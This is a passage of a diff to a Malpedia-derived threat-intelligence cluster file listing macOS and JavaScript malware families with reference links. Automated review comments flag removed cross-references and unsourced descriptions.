- "http://resources.infosecinstitute.com/scanbox-framework/",
- "https://www.secureworks.com/research/threat-profiles/bronze-mohawk",
- "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global",
+ "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/",
"https://www.proofpoint.com/us/blog/threat-insight/chasing-currents-espionage-south-china-sea",
"https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks",
- "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/"
+ "https://www.proofpoint.com/us/blog/threat-insight/ta413-leverages-new-friarfox-browser-extension-target-gmail-accounts-global",
+ "http://resources.infosecinstitute.com/scanbox-framework/",
+ "https://www.secureworks.com/research/threat-profiles/bronze-mohawk"
],
"synonyms": [],
"type": []
@@ -7977,9 +8442,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/"
+ "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/",
+ "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf"
],
"synonyms": [],
"type": []
@@ -8018,9 +8483,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext",
- "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/",
"https://kindredsec.wordpress.com/2019/08/12/an-overview-of-public-platform-c2s/",
- "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/"
+ "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/",
+ "https://kindredsec.com/2019/08/12/an-overview-of-public-platform-c2s/"
],
"synonyms": [],
"type": []
@@ -8046,8 +8511,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_001",
- "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef",
- "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f"
+ "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f",
+ "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef"
],
"synonyms": [],
"type": []
@@ -8111,16 +8576,16 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/js.valak",
- "https://security-soup.net/analysis-of-valak-maldoc/",
- "https://unit42.paloaltonetworks.com/valak-evolution/",
- "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7",
"https://securityintelligence.com/posts/sodinokibi-ransomware-incident-response-intelligence-together/",
- "https://twitter.com/malware_traffic/status/1207824548021886977",
- "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
"https://unit42.paloaltonetworks.com/atoms/monsterlibra/",
- "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/",
+ "https://threatresearch.ext.hp.com/detecting-ta551-domains/",
+ "https://medium.com/@prsecurity_/casual-analysis-of-valak-c2-3497fdb79bf7",
"https://www.cybereason.com/blog/valak-more-than-meets-the-eye",
- "https://threatresearch.ext.hp.com/detecting-ta551-domains/"
+ "https://unit42.paloaltonetworks.com/valak-evolution/",
+ "https://blog.talosintelligence.com/2020/07/valak-emerges.html",
+ "https://security-soup.net/analysis-of-valak-maldoc/",
+ "https://labs.sentinelone.com/valak-malware-and-the-connection-to-gozi-loader-confcrew/",
+ "https://twitter.com/malware_traffic/status/1207824548021886977"
],
"synonyms": [
"Valek"
@@ -8148,9 +8613,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/jsp.godzilla_webshell",
- "https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/",
+ "https://blog.gigamon.com/2022/09/28/investigating-web-shells/",
"https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/",
- "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/"
+ "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/",
+ "https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/"
],
"synonyms": [],
"type": []
@@ -8160,30 +8626,60 @@
},
{
"description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.3cx_backdoor",
+ "https://objective-see.org/blog/blog_0x73.html",
+ "https://objective-see.org/blog/blog_0x74.html"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d5e10bf9-9de8-46be-96d0-aa502b14ffe8",
+ "value": "3CX Backdoor (OS X)"
+ },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.amos",
+ "https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/"
+ ],
+ "synonyms": [
+ "Atomic macOS Stealer"
+ ],
+ "type": []
+ },
+ "uuid": "2fa2be52-e44f-4998-bde7-c66cfb6f4521",
+ "value": "AMOS"
+ },
+ {
+ "description": "According to PcRisk AppleJeus is the name of backdoor malware that was distributed by the Lazarus group. They spread this malicious software through a fake app disguised as a cryptocurrency trading application called Celas Trade Pro.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://securelist.com/operation-applejeus-sequel/95596/",
- "https://objective-see.com/blog/blog_0x54.html",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a",
- "https://objective-see.com/blog/blog_0x49.html",
- "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e",
- "https://objective-see.com/blog/blog_0x5F.html",
- "https://securelist.com/operation-applejeus/87553/",
- "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56",
+ "https://www.youtube.com/watch?v=1NkzTKkEM2k",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/",
+ "https://posts.specterops.io/introducing-venator-a-macos-tool-for-proactive-detection-34055a017e56",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
+ "https://objective-see.com/blog/blog_0x54.html",
+ "https://objective-see.com/blog/blog_0x49.html",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c",
- "https://www.youtube.com/watch?v=1NkzTKkEM2k",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-048a",
- "https://www.youtube.com/watch?v=rjA0Vf75cYk",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b",
- "https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/"
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-048a",
+ "https://securelist.com/operation-applejeus-sequel/95596/",
+ "https://securelist.com/operation-applejeus/87553/",
+ "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf",
+ "https://www.youtube.com/watch?v=rjA0Vf75cYk"
],
"synonyms": [],
"type": []
@@ -8211,11 +8707,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.bundlore",
- "https://www.trendmicro.com/en_hk/research/21/f/nukesped-copies-fileless-code-from-bundlore--leaves-it-unused.html",
- "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf",
- "https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c",
+ "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/",
"https://twitter.com/ConfiantIntel/status/1393215825931288580?s=20",
- "https://labs.sentinelone.com/resourceful-macos-malware-hides-in-named-fork/"
+ "https://www.trendmicro.com/en_hk/research/21/f/nukesped-copies-fileless-code-from-bundlore--leaves-it-unused.html",
+ "https://blog.confiant.com/new-macos-bundlore-loader-analysis-ca16d19c058c",
+ "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf"
],
"synonyms": [
"SurfBuyer"
@@ -8260,8 +8756,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.cdds",
"https://www.sentinelone.com/labs/infect-if-needed-a-deeper-dive-into-targeted-backdoor-macos-macma/",
- "https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/",
- "https://objective-see.com/blog/blog_0x69.html"
+ "https://objective-see.com/blog/blog_0x69.html",
+ "https://blog.google/threat-analysis-group/analyzing-watering-hole-campaign-using-macos-exploits/"
],
"synonyms": [
"Macma"
@@ -8276,9 +8772,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.choziosi",
- "https://redcanary.com/blog/chromeloader/",
- "https://www.th3protocol.com/2022/Choziosi-Loader",
"https://www.gdatasoftware.com/blog/2022/01/37236-qr-codes-on-twitter-deliver-malicious-chrome-extension",
+ "https://www.th3protocol.com/2022/Choziosi-Loader",
+ "https://blogs.blackberry.com/en/2022/11/chromeloader-infects-the-browser-by-loading-malicious-extension",
+ "https://redcanary.com/blog/chromeloader/",
"https://www.crowdstrike.com/blog/how-crowdstrike-uncovered-a-new-macos-browser-hijacking-campaign/"
],
"synonyms": [
@@ -8295,7 +8792,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.cloud_mensis",
- "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/"
+ "https://www.welivesecurity.com/2022/07/19/i-see-what-you-did-there-look-cloudmensis-macos-spyware/",
+ "https://twitter.com/ESETresearch/status/1575103839115804672"
],
"synonyms": [],
"type": []
@@ -8308,8 +8806,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief",
- "https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/",
- "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed"
+ "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed",
+ "https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/"
],
"synonyms": [],
"type": []
@@ -8322,8 +8820,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat",
- "https://objective-see.com/blog/blog_0x2A.html",
- "https://objectivebythesea.com/v2/talks/OBTS_v2_Seele.pdf"
+ "https://objectivebythesea.com/v2/talks/OBTS_v2_Seele.pdf",
+ "https://objective-see.com/blog/blog_0x2A.html"
],
"synonyms": [],
"type": []
@@ -8354,15 +8852,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "5bc62523-dc80-46b4-b5cb-9caf44c11552",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142",
"value": "CpuMeaner"
},
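Review bot: the deleted `related` entry pointing at `5bc62523-dc80-46b4-b5cb-9caf44c11552` is a content change, not a reordering, and it is the only change in this hunk; confirm that dropping the `similar` relation for CpuMeaner is intended, as with the NanHaiShu hunk above.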
@@ -8371,9 +8860,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater",
+ "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/",
"https://digitasecurity.com/blog/2018/02/05/creativeupdater/",
- "https://objective-see.com/blog/blog_0x29.html",
- "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/"
+ "https://objective-see.com/blog/blog_0x29.html"
],
"synonyms": [],
"type": []
@@ -8386,9 +8875,9 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis",
- "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines",
"https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?",
- "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html"
+ "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html",
+ "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines"
],
"synonyms": [],
"type": []
@@ -8414,17 +8903,17 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.dacls",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
"https://objective-see.com/blog/blog_0x57.html",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability",
- "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
- "https://www.sygnia.co/mata-framework",
- "https://objective-see.com/blog/blog_0x5F.html",
"https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability/",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/new-macos-dacls-rat-backdoor-show-lazarus-multi-platform-attack-capability",
+ "https://www.sygnia.co/mata-framework",
+ "https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
"https://www.sentinelone.com/blog/four-distinct-families-of-lazarus-malware-target-apples-macos-platform/",
- "https://blog.malwarebytes.com/threat-analysis/2020/05/new-mac-variant-of-lazarus-dacls-rat-distributed-via-trojanized-2fa-app/"
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
],
"synonyms": [],
"type": []
@@ -8442,15 +8931,6 @@
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "34688253-fea5-4770-bf96-55f45077c347",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a8e71805-014d-4998-b21e-3125da800124",
"value": "DarthMiner"
},
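Review bot: the whole `related` block on DarthMiner (a `similar` link to dest-uuid 34688253-fea5-4770-bf96-55f45077c347, tagged almost-certain) is removed with nothing replacing it. Nothing in the hunk says why; if the target cluster entry still exists, this silently loses a cross-reference that consumers of the galaxy rely on. Either keep the block or state in the commit message that these relations are now maintained elsewhere.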
@@ -8473,8 +8953,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster",
- "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html",
- "https://www.f-secure.com/weblog/archives/00002466.html"
+ "https://www.f-secure.com/weblog/archives/00002466.html",
+ "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html"
],
"synonyms": [],
"type": []
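Review bot: this hunk (and most of the following ones) only permutes the `refs` array without adding or removing a URL, which suggests the generator emits refs in an unordered (set-like) sequence. Sorting the refs list deterministically in the generator, for example keeping the Malpedia URL first and the rest in stable insertion order, would stop these no-op reorders from drowning the real changes in the diff.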
@@ -8528,8 +9008,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx",
- "https://twitter.com/JohnLaTwC/status/966139336436498432",
- "https://github.com/Marten4n6/EvilOSX"
+ "https://github.com/Marten4n6/EvilOSX",
+ "https://twitter.com/JohnLaTwC/status/966139336436498432"
],
"synonyms": [],
"type": []
@@ -8538,20 +9018,20 @@
"value": "EvilOSX"
},
{
- "description": "",
+ "description": "According to PcRisk, EvilQuest (also known as ThiefQuest) is like many other malicious programs of this type - it encrypts files and creates a ransom message. In most cases, this type of malware modifies the names of encrypted files by appending certain extensions, however, this ransomware leaves them unchanged.\r\n\r\nIt drops the \"READ_ME_NOW.txt\" in each folder that contains encrypted data and displays another ransom message in a pop-up window. Additionally, this malware is capable of detecting if certain files are stored on the computer, operates as a keylogger, and receives commands from a Command & Control server.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilquest",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://objective-see.com/blog/blog_0x59.html",
- "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/",
- "https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/",
- "https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/",
- "https://objective-see.com/blog/blog_0x5F.html",
- "https://github.com/gdbinit/evilquest_deobfuscator",
"https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
"https://twitter.com/dineshdina04/status/1277668001538433025",
- "https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/"
+ "https://www.bleepingcomputer.com/news/security/evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs/",
+ "https://labs.sentinelone.com/breaking-evilquest-reversing-a-custom-macos-ransomware-file-encryption-routine/",
+ "https://objective-see.com/blog/blog_0x59.html",
+ "https://github.com/gdbinit/evilquest_deobfuscator",
+ "https://www.sentinelone.com/labs/defeating-macos-malware-anti-analysis-tricks-with-radare2/",
+ "https://objective-see.com/blog/blog_0x5F.html",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://www.sentinelone.com/blog/evilquest-a-new-macos-malware-rolls-ransomware-spyware-and-data-theft-into-one/"
],
"synonyms": [
"ThiefQuest"
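Review bot: the new EvilQuest description opens with "According to PcRisk" but no PcRisk URL is added to `refs`, so the quoted claim cannot be traced from the cluster itself; add the source URL alongside the attribution. The description also presents EvilQuest purely as file-encrypting ransomware, while refs in the same hunk characterise it differently ("evilquest-wiper-uses-ransomware-cover-to-steal-files-from-macs", "rolls-ransomware-spyware-and-data-theft-into-one"); a sentence noting the data-theft component would keep the description consistent with its own references.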
@@ -8579,12 +9059,12 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.finfisher",
+ "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
"https://netzpolitik.org/2020/our-criminal-complaint-german-state-malware-company-finfisher-raided/",
"https://reverse.put.as/2020/09/26/the-finfisher-tales-chapter-1/",
+ "https://objective-see.com/blog/blog_0x4F.html",
"https://securelist.com/finspy-unseen-findings/104322/",
- "https://objective-see.com/blog/blog_0x5F.html",
- "https://www.amnesty.org/en/latest/research/2020/09/german-made-finspy-spyware-found-in-egypt-and-mac-and-linux-versions-revealed/",
- "https://objective-see.com/blog/blog_0x4F.html"
+ "https://objective-see.com/blog/blog_0x5F.html"
],
"synonyms": [],
"type": []
@@ -8597,11 +9077,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback",
+ "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities",
"https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed",
"http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html",
"https://en.wikipedia.org/wiki/Flashback_(Trojan)",
- "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html",
- "https://www.crowdstrike.com/blog/how-crowdstrike-analyzes-macos-malware-to-optimize-automated-detection-capabilities"
+ "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html"
],
"synonyms": [
"FakeFlash"
@@ -8616,27 +9096,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly",
- "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/",
- "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/",
- "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html",
"https://objectivebythesea.com/v3/talks/OBTS_v3_tReed.pdf",
- "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/",
- "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/"
+ "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/",
+ "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html",
+ "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/",
+ "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/",
+ "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/"
],
"synonyms": [
"Quimitchin"
],
"type": []
},
- "related": [
- {
- "dest-uuid": "6a6525b9-4656-4973-ab45-588592395d0c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597",
"value": "FruitFly"
},
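Review bot: besides the refs reorder, this hunk drops FruitFly's `related` block (a `similar` link to dest-uuid 6a6525b9-4656-4973-ab45-588592395d0c, tagged almost-certain) without replacement. Confirm the target entry was actually removed or that the relation is regenerated elsewhere; if neither, keep the block.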
@@ -8645,8 +9116,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.gimmick",
- "https://cybersecuritynews.com/gimmick-malware-attacks/",
- "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/"
+ "https://www.volexity.com/blog/2022/03/22/storm-cloud-on-the-horizon-gimmick-malware-strikes-at-macos/",
+ "https://cybersecuritynews.com/gimmick-malware-attacks/"
],
"synonyms": [],
"type": []
@@ -8659,8 +9130,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.gmera",
- "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/",
"https://blog.trendmicro.com/trendlabs-security-intelligence/mac-malware-that-spoofs-trading-app-steals-user-information-uploads-it-to-website/",
+ "https://www.welivesecurity.com/2020/07/16/mac-cryptocurrency-trading-application-rebranded-bundled-malware/",
"https://objective-see.com/blog/blog_0x53.html"
],
"synonyms": [
@@ -8706,33 +9177,38 @@
"description": "",
"meta": {
"refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab",
- "https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html",
- "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.malwarology.com/2022/05/janicab-series-first-steps-in-the-infection-chain/",
- "https://www.malwarology.com/2022/05/janicab-series-further-steps-in-the-infection-chain/",
- "https://www.malwarology.com/2022/05/janicab-series-attibution-and-iocs/",
- "https://archive.f-secure.com/weblog/archives/00002576.html",
- "https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/",
- "https://www.macmark.de/blog/osx_blog_2013-08-a.php",
- "https://securelist.com/deathstalker-mercenary-triumvirate/98177/",
- "https://www.malwarology.com/posts/5-janicab-part_1/"
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.interception",
+ "https://labs.k7computing.com/index.php/lazarus-apts-operation-interception-uses-signed-binary/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "d4f7ea92-04e7-405c-9faf-7993ffd5c473",
+ "value": "Interception (OS X)"
+ },
+ {
+ "description": "According to Patrick Wardle, this malware persists a python script as a cron job. \r\nSteps: \r\n1. Python installer first saves any existing cron jobs into a temporary file named '/tmp/dump'. \r\n2. Appends its new job to this file.\r\n3. Once the new cron job has been added 'python (~/.t/runner.pyc)' runs every minute.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.janicab",
+ "https://www.malwarology.com/posts/5-janicab-part_1/",
+ "https://blog.avast.com/2013/07/22/multisystem-trojan-janicab-attacks-windows-and-macosx-via-scripts/",
+ "https://securelist.com/deathstalker-targets-legal-entities-with-new-janicab-variant/108131/",
+ "https://www.malwarology.com/2022/05/janicab-series-first-steps-in-the-infection-chain/",
+ "https://www.malwarology.com/2022/05/janicab-series-attibution-and-iocs/",
+ "https://archive.f-secure.com/weblog/archives/00002576.html",
+ "https://sec0wn.blogspot.com/2018/12/powersing-from-lnk-files-to-janicab.html",
+ "https://securelist.com/apt-trends-report-q3-2020/99204/",
+ "https://www.malwarology.com/2022/05/janicab-series-further-steps-in-the-infection-chain/",
+ "https://www.malwarology.com/2022/05/janicab-series-the-core-artifact/",
+ "https://www.macmark.de/blog/osx_blog_2013-08-a.php",
+ "https://securelist.com/deathstalker-mercenary-triumvirate/98177/"
],
"synonyms": [],
"type": []
},
- "related": [
- {
- "dest-uuid": "c3c20c4b-e12a-42e5-960a-eea4644014f4",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "01325d85-297f-40d5-b829-df9bd996af5a",
- "value": "Janicab"
+ "value": "Janicab (OS X)"
},
{
"description": "",
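Review bot: the `related` link from Janicab to dest-uuid c3c20c4b-e12a-42e5-960a-eea4644014f4 is removed in the same hunk that renames the entry from "Janicab" to "Janicab (OS X)"; if the rename reflects a per-platform split, a `similar` link to the other-platform Janicab is exactly the relation that should survive, so please keep it. Keeping the uuid 01325d85-297f-40d5-b829-df9bd996af5a across the rename is right, but note the `value` change will break any lookups keyed on the old name. The new description is attributed to Patrick Wardle, yet no objective-see URL is in the new refs list; add the source, and consider writing the numbered steps as plain prose rather than a "Steps:" list, since the other descriptions in this file are single paragraphs. The inserted "Interception (OS X)" entry that reuses the old refs slot looks correct (distinct uuid d4f7ea92-04e7-405c-9faf-7993ffd5c473, Malpedia URL osx.interception).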
@@ -8754,10 +9230,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap",
- "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/",
- "https://objective-see.com/blog/blog_0x16.html",
"https://www.welivesecurity.com/2016/08/30/osxkeydnap-spreads-via-signed-transmission-application/",
- "https://github.com/eset/malware-ioc/tree/master/keydnap"
+ "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/",
+ "https://github.com/eset/malware-ioc/tree/master/keydnap",
+ "https://objective-see.com/blog/blog_0x16.html"
],
"synonyms": [],
"type": []
@@ -8785,10 +9261,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex",
- "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
- "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/",
"https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html",
+ "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf",
"https://objective-see.com/blog/blog_0x16.html",
+ "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/",
"https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/"
],
"synonyms": [
@@ -8857,6 +9333,20 @@
"uuid": "15daa766-f721-4fd5-95fb-153f5361fb87",
"value": "Leverage"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.lockbit",
+ "https://twitter.com/malwrhunterteam/status/1647384505550876675",
